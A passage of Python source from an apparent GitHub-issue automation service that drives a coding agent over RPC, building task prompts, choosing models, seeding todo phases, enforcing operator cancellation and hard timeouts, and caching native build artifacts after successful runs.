pr_status = "no PR opened yet"
|
||||
elif issue_row.pr_number is None:
|
||||
pr_status = "no PR opened yet"
|
||||
elif issue_row.state == "merged":
|
||||
pr_status = f"PR #{issue_row.pr_number} was merged"
|
||||
elif issue_row.state in ("closed", "abandoned"):
|
||||
pr_status = f"PR #{issue_row.pr_number} was closed without merge"
|
||||
else:
|
||||
pr_status = f"PR #{issue_row.pr_number} is open"
|
||||
if directive is not None:
|
||||
return persona.directive(
|
||||
repo=inputs.repo,
|
||||
issue=inputs.issue,
|
||||
workspace=inputs.workspace,
|
||||
comment=comment,
|
||||
directive=directive,
|
||||
pr_status=pr_status,
|
||||
pr_number=pr_number,
|
||||
)
|
||||
return persona.followup_comment(
|
||||
repo=inputs.repo,
|
||||
issue=inputs.issue,
|
||||
workspace=inputs.workspace,
|
||||
comment=comment,
|
||||
pr_status=pr_status,
|
||||
pr_number=pr_number,
|
||||
)
|
||||
if task_kind == "handle_review":
|
||||
assert review_payload is not None
|
||||
path = str(review_payload.get("path") or "")
|
||||
start = review_payload.get("start_line") or review_payload.get("line")
|
||||
end = review_payload.get("line") or review_payload.get("original_line")
|
||||
if isinstance(start, int) and isinstance(end, int) and start != end:
|
||||
line_range = f":L{start}-L{end}"
|
||||
elif isinstance(end, int):
|
||||
line_range = f":L{end}"
|
||||
else:
|
||||
line_range = ""
|
||||
body = str(review_payload.get("body") or "")
|
||||
author = str(review_payload.get("author") or "")
|
||||
return persona.followup_review(
|
||||
repo=inputs.repo,
|
||||
workspace=inputs.workspace,
|
||||
pr_number=int(pr_number or 0),
|
||||
comment_author=author,
|
||||
comment_body=body,
|
||||
comment_path=path,
|
||||
comment_line_range=line_range,
|
||||
)
|
||||
raise ValueError(f"unknown task kind: {task_kind!r}")
|
||||
|
||||
|
||||
def _run_rpc_blocking(
|
||||
inputs: TaskInputs,
|
||||
*,
|
||||
task_kind: str,
|
||||
prompt: str,
|
||||
loop: asyncio.AbstractEventLoop,
|
||||
bindings: ToolBindings,
|
||||
directive: DirectiveInfo | None = None,
|
||||
) -> str | None:
|
||||
"""Run a full RPC turn synchronously. Returns final assistant text (or None)."""
|
||||
settings = inputs.settings
|
||||
|
||||
tools_called: set[str] = set()
|
||||
|
||||
def _on_tool_end(event: ToolExecutionEndEvent) -> None:
|
||||
tool_name = event.tool_name
|
||||
if event.result is not None:
|
||||
tools_called.add(tool_name)
|
||||
log.info(
|
||||
"tool_end",
|
||||
extra={
|
||||
"issue": bindings.issue_key,
|
||||
"tool": tool_name,
|
||||
"ok": event.result is not None,
|
||||
},
|
||||
)
|
||||
|
||||
def _on_msg(event: MessageUpdateEvent) -> None:
|
||||
ev = event.assistant_message_event
|
||||
if isinstance(ev, dict) and ev.get("type") == "text_delta":
|
||||
log.debug("delta", extra={"issue": bindings.issue_key, "delta": str(ev.get("delta", ""))[:200]})
|
||||
|
||||
rpc_env = _build_extra_env(settings)
|
||||
rpc_env.update(_prepare_slot_runtime_env(inputs.workspace, inputs.slot_uid))
|
||||
rpc_env.update(_safe_directory_env(bindings.workspace.repo_dir))
|
||||
rpc_env.update(_git_identity_env(inputs.settings.resolved_author_name, inputs.settings.git_author_email))
|
||||
resuming = _has_prior_session(bindings.workspace.session_dir)
|
||||
extra_args: tuple[str, ...] = ("--continue",) if resuming else ()
|
||||
log.info(
|
||||
"rpc_resume",
|
||||
extra={
|
||||
"issue": bindings.issue_key,
|
||||
"task": task_kind,
|
||||
"resuming": resuming,
|
||||
"session_dir": str(bindings.workspace.session_dir),
|
||||
"attempts": inputs.attempts,
|
||||
},
|
||||
)
|
||||
model_override, thinking_override = _resolve_pragma_overrides(directive, settings)
|
||||
chosen_model = model_override or settings.pick_model()
|
||||
chosen_thinking = thinking_override or settings.thinking_level
|
||||
log.info(
|
||||
"rpc_model_pick",
|
||||
extra={
|
||||
"issue": bindings.issue_key,
|
||||
"model": chosen_model,
|
||||
"pool": list(settings.model_pool),
|
||||
"thinking": chosen_thinking,
|
||||
"pragma_model": model_override,
|
||||
"pragma_thinking": thinking_override,
|
||||
},
|
||||
)
|
||||
inputs.db.set_event_model(inputs.delivery_id, chosen_model)
|
||||
|
||||
with RpcClient(
|
||||
executable=settings.omp_command,
|
||||
cwd=bindings.workspace.repo_dir,
|
||||
session_dir=bindings.workspace.session_dir,
|
||||
env=rpc_env,
|
||||
no_session=False,
|
||||
no_title=True,
|
||||
model=chosen_model,
|
||||
provider=settings.provider,
|
||||
thinking=chosen_thinking if chosen_thinking != "off" else None,
|
||||
append_system_prompt=persona.system_append(repo=inputs.repo, issue=inputs.issue, workspace=inputs.workspace),
|
||||
custom_tools=host_tools.build(bindings),
|
||||
request_timeout=settings.request_timeout_seconds,
|
||||
startup_timeout=60.0,
|
||||
max_event_history=50_000,
|
||||
extra_args=extra_args,
|
||||
user=inputs.slot_uid,
|
||||
group=inputs.slot_uid if inputs.slot_uid is not None else None,
|
||||
extra_groups=["omp"] if inputs.slot_uid is not None else None,
|
||||
) as client:
|
||||
# Arm cancellation: from this point the API can kill the omp subprocess
|
||||
# out from under us, which makes `prompt_and_wait` raise an `RpcError`
|
||||
# we'll let propagate. The `with` exit calls `client.stop()` again, but
|
||||
# it's idempotent.
|
||||
#
|
||||
# NOTE: omp_rpc.RpcClient.stop() has a bug where it sets `_stopping=True`
|
||||
# before the stdout reader loop notices the closed pipe, so the reader's
|
||||
# `if not self._stopping` guard skips `_mark_closed()` entirely.
|
||||
# `_wait_for_agent_end` then blocks on `_event_condition` until the hard
|
||||
# timeout because `_closed_error` is never set. We work around it here
|
||||
# by calling `_mark_closed()` ourselves after stop returns — this is
|
||||
# idempotent (it no-ops when `_closed_error` is already set).
|
||||
def _cancel_hook() -> None:
|
||||
try:
|
||||
client.stop()
|
||||
finally:
|
||||
# Private API, but the only way to unblock `_wait_for_agent_end`
|
||||
# without waiting for the request timeout. Idempotent.
|
||||
client._mark_closed( # noqa: SLF001
|
||||
RpcProcessExitError("cancelled by operator")
|
||||
)
|
||||
|
||||
if bindings.abort is not None:
|
||||
bindings.abort.stop = _cancel_hook
|
||||
register_cancel_hook(_cancel_hook)
|
||||
try:
|
||||
client.install_headless_ui()
|
||||
client.on_tool_execution_end(_on_tool_end)
|
||||
client.on_message_update(_on_msg)
|
||||
|
||||
phases = persona.seed_phases(task_kind)
|
||||
if phases:
|
||||
try:
|
||||
if task_kind == "triage_issue" and not resuming:
|
||||
# Fresh triage: seed the full plan.
|
||||
client.set_todos(phases)
|
||||
elif task_kind == "triage_issue":
|
||||
# Resumed triage: prior phases are intact in the
|
||||
# JSONL transcript — re-seeding would clobber any
|
||||
# in-progress task statuses. Trust the loaded state.
|
||||
log.info(
|
||||
"set_todos skipped (resume)",
|
||||
extra={"issue": bindings.issue_key, "task": task_kind},
|
||||
)
|
||||
else:
|
||||
# Follow-up: keep prior phases (e.g. Reproduce / Fix / PR)
|
||||
# so the agent still sees the context, but append the
|
||||
# follow-up phase at the end.
|
||||
existing = list(client.get_todos())
|
||||
merged = [
|
||||
{
|
||||
"id": p.id,
|
||||
"name": p.name,
|
||||
"tasks": [
|
||||
{
|
||||
"id": t.id,
|
||||
"content": t.content,
|
||||
"status": t.status,
|
||||
"notes": t.notes,
|
||||
"details": t.details,
|
||||
}
|
||||
for t in p.tasks
|
||||
],
|
||||
}
|
||||
for p in existing
|
||||
] + phases
|
||||
client.set_todos(merged)
|
||||
except RpcError as exc:
|
||||
log.warning("set_todos failed", extra={"err": str(exc)})
|
||||
|
||||
log.info(
|
||||
"rpc_start",
|
||||
extra={"issue": bindings.issue_key, "task": task_kind, "branch": bindings.workspace.branch},
|
||||
)
|
||||
hard_timeout_seconds = settings.task_timeout_seconds + settings.task_timeout_hard_grace_seconds
|
||||
hard_timeout_fired = threading.Event()
|
||||
|
||||
def _hard_stop() -> None:
|
||||
hard_timeout_fired.set()
|
||||
log.warning(
|
||||
"rpc_hard_timeout",
|
||||
extra={"issue": bindings.issue_key, "task": task_kind, "timeout": hard_timeout_seconds},
|
||||
)
|
||||
try:
|
||||
_cancel_hook()
|
||||
except Exception:
|
||||
log.exception(
|
||||
"rpc hard timeout stop failed", extra={"issue": bindings.issue_key, "task": task_kind}
|
||||
)
|
||||
|
||||
hard_timer = threading.Timer(hard_timeout_seconds, _hard_stop)
|
||||
hard_timer.daemon = True
|
||||
hard_timer.start()
|
||||
try:
|
||||
turn = _drive_turn(
|
||||
client,
|
||||
prompt,
|
||||
task_kind=task_kind,
|
||||
inputs=inputs,
|
||||
bindings=bindings,
|
||||
tools_called=tools_called,
|
||||
)
|
||||
if turn is None:
|
||||
return None
|
||||
finally:
|
||||
hard_timer.cancel()
|
||||
if hard_timeout_fired.is_set():
|
||||
raise TimeoutError("omp task exceeded hard timeout")
|
||||
log.info(
|
||||
"rpc_done",
|
||||
extra={
|
||||
"issue": bindings.issue_key,
|
||||
"task": task_kind,
|
||||
"messages": len(turn.messages),
|
||||
"events": len(turn.events),
|
||||
},
|
||||
)
|
||||
return turn.assistant_text
|
||||
finally:
|
||||
unregister_cancel_hook()
|
||||
|
||||
|
||||
async def run_task(
|
||||
*,
|
||||
task_kind: str,
|
||||
inputs: TaskInputs,
|
||||
comment: CommentInfo | None = None,
|
||||
pr_number: int | None = None,
|
||||
review_payload: dict[str, Any] | None = None,
|
||||
directive: DirectiveInfo | None = None,
|
||||
) -> str | None:
|
||||
"""Async wrapper that runs the synchronous RPC driver on a worker thread."""
|
||||
loop = asyncio.get_running_loop()
|
||||
bindings = ToolBindings(
|
||||
db=inputs.db,
|
||||
github=inputs.github,
|
||||
git_transport=inputs.git_transport,
|
||||
repo=inputs.repo,
|
||||
issue=inputs.issue,
|
||||
workspace=inputs.workspace,
|
||||
loop=loop,
|
||||
settings=inputs.settings,
|
||||
author_name=inputs.settings.resolved_author_name,
|
||||
author_email=inputs.settings.git_author_email,
|
||||
inbound_thread_number=pr_number,
|
||||
inbound_is_pr=pr_number is not None,
|
||||
slot_uid=inputs.slot_uid,
|
||||
abort=AbortController(),
|
||||
)
|
||||
resuming = _has_prior_session(inputs.workspace.session_dir)
|
||||
prompt = _build_prompt(
|
||||
task_kind,
|
||||
inputs,
|
||||
comment=comment,
|
||||
pr_number=pr_number,
|
||||
review_payload=review_payload,
|
||||
directive=directive,
|
||||
resuming=resuming,
|
||||
)
|
||||
try:
|
||||
result = await asyncio.to_thread(
|
||||
_run_rpc_blocking,
|
||||
inputs,
|
||||
task_kind=task_kind,
|
||||
prompt=prompt,
|
||||
loop=loop,
|
||||
bindings=bindings,
|
||||
directive=directive,
|
||||
)
|
||||
except BaseException:
|
||||
# Failed/aborted task: NEVER capture, the artifacts may be inconsistent
|
||||
# with the source state and would poison the cache.
|
||||
raise
|
||||
else:
|
||||
await asyncio.to_thread(_capture_natives_cache, inputs)
|
||||
return result
|
||||
|
||||
|
||||
def _capture_natives_cache(inputs: TaskInputs) -> None:
|
||||
"""Best-effort: store the workspace's fresh natives under its current key.
|
||||
|
||||
Runs after a successful task on a worker thread. ANY failure is logged
|
||||
and swallowed — cache errors NEVER fail a task.
|
||||
"""
|
||||
cache = inputs.natives_cache
|
||||
if cache is None:
|
||||
return
|
||||
workspace = inputs.workspace
|
||||
native_dir = workspace.repo_dir / "packages" / "natives" / "native"
|
||||
if not native_dir.exists():
|
||||
return
|
||||
try:
|
||||
key = natives_compute_key(workspace.repo_dir)
|
||||
except Exception as exc:
|
||||
log.debug(
|
||||
"natives_cache capture key compute failed",
|
||||
extra={"workspace": workspace.workspace_key, "err": str(exc)},
|
||||
)
|
||||
return
|
||||
try:
|
||||
stored = cache.capture(
|
||||
workspace.repo_full_name,
|
||||
key,
|
||||
native_dir,
|
||||
source_workspace=workspace.workspace_key,
|
||||
)
|
||||
except Exception as exc:
|
||||
log.warning(
|
||||
"natives_cache capture failed",
|
||||
extra={"workspace": workspace.workspace_key, "key": key, "err": str(exc)},
|
||||
)
|
||||
return
|
||||
log.info(
|
||||
"natives_cache",
|
||||
extra={
|
||||
"action": "stored" if stored is not None else "skip",
|
||||
"workspace": workspace.workspace_key,
|
||||
"repo": workspace.repo_full_name,
|
||||
"key": key,
|
||||
"cache_dir": str(stored) if stored else None,
|
||||
},
|
||||
)
|
||||
|
||||
|
||||
__all__ = ["DirectiveInfo", "TaskInputs", "ThreadMessage", "run_task"]
|
||||
Reference in New Issue
Block a user